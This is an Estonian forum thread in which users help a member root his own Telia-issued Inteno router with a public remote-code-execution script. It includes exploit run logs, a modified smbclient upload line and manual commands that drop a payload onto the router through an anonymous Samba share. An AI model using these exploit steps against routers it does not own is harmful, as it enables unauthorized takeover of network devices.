Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
autor |
sõnum |
|
bladerunner
HV Guru
liitunud: 17.01.2002
|
14.03.2018 17:46:37
|
|
|
ot: |
jägaja, kõik õige, Slingshot'st hakati rääkima paar päeva tagasi aga see turvaauk, mis väidetavalt võimaldas Slingshotil end paigaldada, lapiti ära Mikrotik poolt juba 09. märts 2017.
https://www.wired.com/story/router-hacking-slingshot-spy-operation-compromised-more-than-100-targets/
tsitaat: |
... while Kaspersky's researchers haven't yet determined how the spyware initially infected the majority of those targets, in some cases the malicious code had been installed via small-business-grade routers sold by the Latvian firm MikroTik, which the Slingshot hackers had compromised. |
|
_________________ Experience is what you get when you don't get what you want. |
|
Kommentaarid: 161 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
150 |
|
tagasi üles |
|
|
indrpo
HV Guru
liitunud: 14.11.2004
|
14.03.2018 19:44:48
|
|
|
siven kirjutas: |
praegu endal see dg200a vist oli kavatsen selle välja osta .aga küsimus kas selle sama ruuteriga tuleviku see VDSL plus ka töötab? |
nii ja naa. võimalik, et Telia kasutab koos uute ruuteritega ja vectoringiga olemasolevate intenode 17a protokolli maksimumi ära seega 100/20 paketti saab kenasti ka praeguste ruuteritega tarbida, kui heas kaablis ja õigel kaugusel oled ning jaam toetab.
seda näeb siis kui uued teenused turul.
klient saab üüriruuterit alati vahetada, see pole probleem.
üüriga ei saa seade kunagi kinni makstuks, see on garantii, vahetamise ja seadme amortisatsiooni tasu, samal ajal pole siduvat lepingut, täna võtad, homme tagastad kui vaja. tahad osta, vali ostuvõimaluste hulgast, tahad üüri mingi aeg lõpetada ja seadet omastada, lõpeta trahviga.
disabled inteno wifi seadistus salvestatakse Telias varukonfis seega ei tohiks ta kunagi hiljem aktiviseeruda.
oma AP kasutamine on lihtne ja lubatud, mul ruuter sahvris ja elutoas tv kapis 1cat5e mille küljes zyxel armor millel neli lan pesa, meedia vidinad selle küljes, digiboks küll eraldi kaabliga aga võiks vabalt ka samasse apsse pista.
|
|
Kommentaarid: 253 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
0 :: |
223 |
|
tagasi üles |
|
|
XeStAiSy
HV Guru
liitunud: 12.12.2001
|
23.03.2018 08:59:11
|
|
|
Mõni aeg möödunud ilmselt see voice teema on ajalukku visatud ja ei toimi sortsust saadud firmwarega?
_________________ Punktkeevitus patareidele/akudele. Akutrelli/laptopi/e-bike. PM |
|
Kommentaarid: 11 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
10 |
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 15:36:58
|
|
|
Kas keegi on suutnud DG301-W7P2U_ELION3.11.6-170626_0111 softiga ruuterile selgeks teha, et management toimiks vaid https -ga ja http on kinni? Ja, et saaks manageerida ka interneti suunalt teatud ip pealt?
Mina https aktiveerimist ei leidnud? Ok, kindla src ip pealt võiks ka http lubada, seega lubasin müüris välise src ip pealt > ruuteri välise ip peale 80 pordi. Väljast ligi ikka ei saa. Siis proovisin sellesama lubatud pordi suunamist edasi ruuteri sisemise ip ja pordi 80 peale. Väljast ligi ei saa. Kui lubada dmz > ruuteri sisemise ip peale, siiis on avatud väljast any:any ruuteri sisemise ip peale ligipääs.
Mälu järgi vanemas softis oli näha ka default tulemüüri reegleid. Uues seda valikut ei leia. Käsureale ka ei saa. Mida veel teha?
EDIT: https -i toeta see ruuter. Ja kuigi on enda seade, ei anna nad root ligipääsu, seega tuleb kas leida sobiv exploit või mingi teine ruuter.
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
02.04.2018 16:39:57
|
|
|
ksuuk, samas teemas on alternatiivne fw olemas. Ja korduvalt ka juttu olnud rooti saamisest.
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 17:04:46
|
|
|
KillFrenzy kirjutas: |
ksuuk, samas teemas on alternatiivne fw olemas. Ja korduvalt ka juttu olnud rooti saamisest. |
Mõtled root -i selle meetodiga - https://neonsea.uk/blog/2017/12/23/rce-inteno-iopsys.html
Proovisin, see ei tööta:
Authenticating...
Got key: xxxx
Adding Samba share...
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
Traceback (most recent call last):
File "./inteno", line 126, in <module>
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
AttributeError: 'module' object has no attribute 'run'
Ja milline alternatiivne firmware võiks stable olla?
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
02.04.2018 17:11:58
|
|
|
Samas postis link. Lauatelefon sellega ei tööta. Tv töötab. Tagasi telia fw peale ei saa. Niiet omal vastutusel.
Mõned peaksid seda kasutama, kui midagi katki oleks ju siis vast teemas näha oleks.
https://neonsea.uk/DG301-W7P2U_neonWRT3.14.0RC9-171229_1947.y2
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 18:12:19
|
|
|
Tänud, Ruuter pakub vaid netti, ei midagi muud. Enne peab vaid MAC -i salvestama, et hiljem väline IP Telia DHCP -st saada.
Kuid kõigepealt oleks vaja root ligipääs saada. Kas keegi on selle scriptiga ja DG301-W7P2U_ELION3.11.6-170626_0111 firmwarega root accessi saanud?
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
02.04.2018 18:17:20
|
|
|
ksuuk, ega mac ei muutu siis.
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 18:21:30
|
|
|
KillFrenzy kirjutas: |
ksuuk, ega mac ei muutu siis. |
Oleneb firmwarest, mõnel on MAC hardcoded ja kirjutatakse flashimisel üle. :(
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
02.04.2018 18:53:44
|
|
|
Proovi uuema Pyhtoniga (vähemalt 3.5). Alla Python 3.5 subprocess.run() funktsiooni ei eksisteeri.
ksuuk kirjutas: |
KillFrenzy kirjutas: |
ksuuk, samas teemas on alternatiivne fw olemas. Ja korduvalt ka juttu olnud rooti saamisest. |
Mõtled root -i selle meetodiga - https://neonsea.uk/blog/2017/12/23/rce-inteno-iopsys.html
Proovisin, see ei tööta:
Authenticating...
Got key: xxxx
Adding Samba share...
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
Traceback (most recent call last):
File "./inteno", line 126, in <module>
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
AttributeError: 'module' object has no attribute 'run'
Ja milline alternatiivne firmware võiks stable olla? |
|
|
Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
55 |
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
02.04.2018 20:28:48
|
|
|
Adebisi kirjutas: |
Proovi uuema Pyhtoniga (vähemalt 3.5). Alla Python 3.5 subprocess.run() funktsiooni ei eksisteeri. |
Uuendasin:
which python3.6
/usr/bin/python3.6
Uus veateade:
Authenticating...
Got key: xxx
Adding Samba share...
Samba share seems to already exist, skipping
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
/bin/sh: 1: smbclient: not found
Traceback (most recent call last):
File "./inteno", line 127, in <module>
shell=True, check=True)
File "/usr/lib/python3.6/subprocess.py", line 418, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command 'smbclient \\\\192.168.1.1\\pwned p -c 'put /root/.payload.tmp pwn.sh'' returned non-zero exit status 127.
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
02.04.2018 20:36:32
|
|
|
see vbl ära ka parandatud vahepeal. kirjuta autorile.
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
02.04.2018 21:36:07
|
|
|
smbclient puudu. Ubuntu ja Debianiliste puhul terminali: sudo apt install smbclient
|
|
Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
55 |
|
tagasi üles |
|
|
seeru
HV veteran
liitunud: 10.02.2004
|
03.04.2018 08:29:22
|
|
|
KillFrenzy kirjutas: |
Tagasi telia fw peale ei saa. Niiet omal vastutusel.
|
Kui vaja, siis saab tagasi ka ikka.
|
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
03.04.2018 10:11:28
|
|
|
Adebisi kirjutas: |
smbclient puudu. Ubuntu ja Debianiliste puhul terminali: sudo apt install smbclient |
Scripti omanik märkas ka seda, tõepoolest, minimal debiani selleks installisin, lasin nüüd ka smbclient -i sisse, aga siiski kaugemale ei saa, tundub, et see auk on suletud. Mida veel teha?
root@debian:~# ./inteno
Authenticating...
Got key: xxx
Adding Samba share...
Samba share seems to already exist, skipping
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_LOGON_FAILURE
Traceback (most recent call last):
File "./inteno", line 127, in <module>
shell=True, check=True)
File "/usr/lib/python3.6/subprocess.py", line 418, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command 'smbclient \\\\192.168.1.1\\pwned p -c 'put /root/.payload.tmp pwn.sh'' returned non-zero exit status 1.
root@debian:~# which smbclient
/usr/bin/smbclient
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
03.04.2018 10:39:22
|
|
|
seeru kirjutas: |
KillFrenzy kirjutas: |
Tagasi telia fw peale ei saa. Niiet omal vastutusel.
|
Kui vaja, siis saab tagasi ka ikka. |
Räägi lähemalt.
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
03.04.2018 12:08:52
|
|
|
ksuuk, vaata kas niisama pääsed sambasharele ligi.
Kas siis failihaldurikaudu smb://192.168.1.1/pwned
või terminalis:
smbclient \\\\192.168.1.1\\pwnded
|
Kui sisse laseb siis saad selle faili üles laadida:
put /root/.payload.tmp pwn.sh
exit |
Kui sinna pwnded kausta õnnestub ligi saada ja faile tekitada siis võid selle scripti tekitatud faili käsitsi sinna kopeerida ja pwn.sh'ks ümber nimetada. Py koodist pead peale seda muidugi
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path), shell=True, check=True) |
selle eemaldama.
Mis ruuteritarkvara versioon muidu on?
|
|
Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
55 |
|
tagasi üles |
|
|
seeru
HV veteran
liitunud: 10.02.2004
|
03.04.2018 17:28:01
|
|
|
KillFrenzy kirjutas: |
seeru kirjutas: |
KillFrenzy kirjutas: |
Tagasi telia fw peale ei saa. Niiet omal vastutusel.
|
Kui vaja, siis saab tagasi ka ikka. |
Räägi lähemalt. |
Lased uuesti Telia firmware peale.
|
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
03.04.2018 17:28:25
|
|
|
seeru, koomik oled? Räägi siis lähemalt kuidas see välja näeb ja kust selle saab.
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
seeru
HV veteran
liitunud: 10.02.2004
|
03.04.2018 17:38:36
|
|
|
KillFrenzy kirjutas: |
seeru, koomik oled? Räägi siis lähemalt kuidas see välja näeb ja kust selle saab. |
Paistab, et sa ka koomik.
Sama protseduur nagu neonsea firmware peale lasid. Või siis ruuteri menüü kaudu.
|
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
03.04.2018 20:02:48
|
|
|
Adebisi kirjutas: |
ksuuk, vaata kas niisama pääsed sambasharele ligi.
Kas siis failihaldurikaudu smb://192.168.1.1/pwned
või terminalis:
smbclient \\\\192.168.1.1\\pwnded
|
Kui sisse laseb siis saad selle faili üles laadida:
put /root/.payload.tmp pwn.sh
exit |
Kui sinna pwnded kausta õnnestub ligi saada ja faile tekitada siis võid selle scripti tekitatud faili käsitsi sinna kopeerida ja pwn.sh'ks ümber nimetada. Py koodist pead peale seda muidugi
subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path), shell=True, check=True) |
selle eemaldama.
Mis ruuteritarkvara versioon muidu on? |
Ei saa:
root@debian:~# smbclient \\\\192.168.1.1\\pwnded
WARNING: The "syslog" option is deprecated
Enter root's password:
Firmware on latest - DG301-W7P2U_ELION3.11.6-170626_0111 Telia ei nõustu admin ligipääsu ka andma. Vaidlen nendega veel sel teemal, ruuter ju minu, koristagu enda soft sealt ära ja andku tunnused.
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
KillFrenzy
HV Guru
liitunud: 05.04.2003
|
03.04.2018 20:05:44
|
|
|
ksuuk, nende softist saad ise ära koristada. Ainuke alternatiiv on eelnevalt lingitud fw.
_________________ M: SFP Telia GPON võrgu jaoks - 40€ |
|
Kommentaarid: 149 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
132 |
|
tagasi üles |
|
|
Adebisi
Kreisi kasutaja
liitunud: 05.07.2003
|
03.04.2018 20:21:04
|
|
|
Versiooni järgi peaks nagu töötama.
Kui seal parooli küsimisele lihtsalt enterit vajutad ilma parooli trükkimata, mis väljundi siis annab?
ksuuk kirjutas: |
Ei saa:
root@debian:~# smbclient \\\\192.168.1.1\\pwnded
WARNING: The "syslog" option is deprecated
Enter root's password:
Firmware on latest - DG301-W7P2U_ELION3.11.6-170626_0111 Telia ei nõustu admin ligipääsu ka andma. Vaidlen nendega veel sel teemal, ruuter ju minu, koristagu enda soft sealt ära ja andku tunnused. |
|
|
Kommentaarid: 58 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
55 |
|
tagasi üles |
|
|
ksuuk
Kreisi kasutaja
liitunud: 06.12.2007
|
03.04.2018 21:09:56
|
|
|
Adebisi kirjutas: |
Versiooni järgi peaks nagu töötama. :-?
Kui seal parooli küsimisele lihtsalt enterit vajutad ilma parooli trükkimata, mis väljundi siis annab?
|
Edit1: Enne pastesin vale tulemuse, kuna ei märganud, et Sul oli typo, mitte pwnded vaid pwned on õige path:
root@debian:~# smbclient \\\\192.168.1.1\\pwned
Enter root's password:
Anonymous login successful
Domain=[INTENOSMB] OS=[Unix] Server=[Samba 3.0.37]
smb: \> put /root/.payload.tmp pwn.sh
putting file /root/.payload.tmp as \pwn.sh (104.4 kb/s) (average 104.4 kb/s)
smb: \> exit
smbclient --version
Version 4.5.12-Debian
Edit2: muutsin seda rida:
#subprocess.run(r"smbclient \\\\%s\\pwned p -c 'put %s pwn.sh'" % (host, path),
subprocess.run(r"smbclient \\\\%s\\pwned -c 'put %s pwn.sh'" % (host, path),
Nüüd tekkis smbclient passwd prompt, enter sinna ja script vudis edasi:
Authenticating...
Got key: xxx
Adding Samba share...
Samba share seems to already exist, skipping
Enabling Samba...
Committing changes...
Setting malicious leasetrigger...
Committing changes...
Rebooting system...
Waiting on reboot...
Creating temp file for payload...
Dropping payload...
Enter root's password:
Anonymous login successful
Domain=[INTENOSMB] OS=[Unix] Server=[Samba 3.0.37]
putting file /root/.payload.tmp as \pwn.sh (15.8 kb/s) (average 15.8 kb/s)
Payload dropped
Authenticating...
Got key: xxx
Executing payload
Cleaning up...
Exploitation complete
Aga sisse ikka ei saa:
ssh root@192.168.1.1
Permission denied (publickey).
|
|
Kommentaarid: 2 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
2 |
|
tagasi üles |
|
|
|